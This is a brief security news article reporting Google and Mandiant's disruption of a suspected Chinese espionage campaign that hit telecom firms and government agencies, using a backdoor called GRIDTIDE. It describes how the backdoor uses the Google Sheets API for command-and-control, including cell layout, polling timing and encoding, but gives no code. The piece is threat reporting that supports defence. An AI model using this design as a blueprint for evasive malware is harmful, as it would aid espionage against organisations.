Cyber: Chinese Cyberspies Breached Dozens Of Telecom Firms, Govt Agencies

Google’s Threat Intelligence Group (GTIG), Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese threat actor that used SaaS API calls to hide malicious traffic in attacks targeting telecom and government networks.

The campaign has been active since at least 2023 and has impacted 53 organizations in 42 countries, with suspected infections in at least 20 more countries.

The initial access vector is unknown, but the researchers note that the threat actor, which Google tracks internally as UNC2814, has previously gained access by exploiting flaws in web servers and edge systems.

Google says that in the recently disrupted campaign, the actor deployed a new C-based backdoor named ‘GRIDTIDE,’ which abuses the Google Sheets API for evasive command-and-control (C2) operations.

GRIDTIDE authenticates to a Google Service Account using a hardcoded private key, and upon launch, it sanitizes the spreadsheet by deleting rows 1-1000 and columns from A to Z.

It then performs host reconnaissance, collecting the username, hostname, OS details, local IP, locale, and timezone, and logging the data in cell V1.

The first cell in the spreadsheet, A1, is the command/status cell, which GRIDTIDE polls constantly to receive instructions.

If any exist, the malware overwrites them with a status string. If empty, the malware retries every second for 120 times, then switches to random 5-10-minute checks to reduce noise.

The A2-An cells are used for writing the command output, exfiltrated files, and uploading tools.

Google reports that GRIDTIDE’s exchanges with the C2 rely on a URL-safe base64 encoding scheme that evades detection by web monitoring tools and blends with normal traffic.

Source: BleepingComputer